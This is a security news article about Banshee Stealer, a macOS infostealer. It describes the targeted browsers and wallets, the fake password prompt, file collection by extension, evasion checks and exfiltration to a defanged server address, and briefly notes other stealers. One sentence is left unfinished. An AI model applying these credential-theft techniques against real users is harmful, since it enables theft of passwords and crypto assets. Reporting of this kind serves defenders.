New stealer malware that is designed to specifically target Apple macOS systems has been uncovered by cybersecurity researchers.
It is available for purchase in the underground of cybercrime and is known as Banshee Stealer. It works with both x86_64 and ARM64 architectures and costs a hefty $3,000 per month.
Elastic Security Labs stated in a report released on Thursday that “Banshee Stealer targets a wide range of browsers, cryptocurrency wallets, and approximately 100 browser extensions, making it a highly versatile and dangerous threat.”
The malware targets Google Chrome, Mozilla Firefox, Brave, Microsoft Edge, Vivaldi, Yandex, Opera, OperaGX, Exodus, Electrum, Coinomi, Guarda, Wasabi Wallet, Atomic, and Ledger as web browsers and cryptocurrency wallets.
It also has the ability to extract system data and passwords from iCloud Keychain passwords and Notes. It also has a slew of anti-analysis and anti-debugging features to check to see if it’s operating in a virtual environment to avoid detection.
Additionally, it avoids infecting Russian-speaking systems by making use of the CFLocaleCopyPreferredLanguages API.
Banshee Stealer, like other macOS malware strains like Cuckoo and MacStealer, uses osascript to show a fake password prompt to get users to enter their system passwords in order to gain privileges.
The ability to collect data from files with the.txt,.docx,.rtf,.doc,.wallet,.keys, and.key extensions from the Desktop and Documents folders is one of the other noteworthy features. After that, the collected data are sent to a remote server via a ZIP file (for example, “45.142.122[.]92/send/”)
Elastic said, “As macOS increasingly becomes a prime target for cybercriminals, Banshee Stealer underscores the rising observance of macOS-specific malware.”
Another macOS stealer strain that uses SwiftUI and Apple’s Open Directory APIs to capture and verify passwords entered by the user in a fictitious prompt displayed in order to complete the installation process was also disclosed by Hunt.io and Kandji.
“It begins by running a Swift-based dropper that displays a fake password prompt to deceive users,” Broadcom-owned Symantec said. “After capturing credentials, the malware verifies them using the OpenDirectory API and subsequently downloads and executes malicious scripts from a command-and-control server.”
Even though fake sites masquerading as OpenAI’s text-to-video artificial intelligence (AI) tool, Sora, are being used to propagate Braodo Stealer,
This development also follows the ongoing emergence of new Windows-based stealers like Flame Stealer.
Separately, phishing emails with RAR archive attachments that impersonate Calcalist and Mako in order to deliver Rhadamanthys Stealer are being sent to Israeli users.
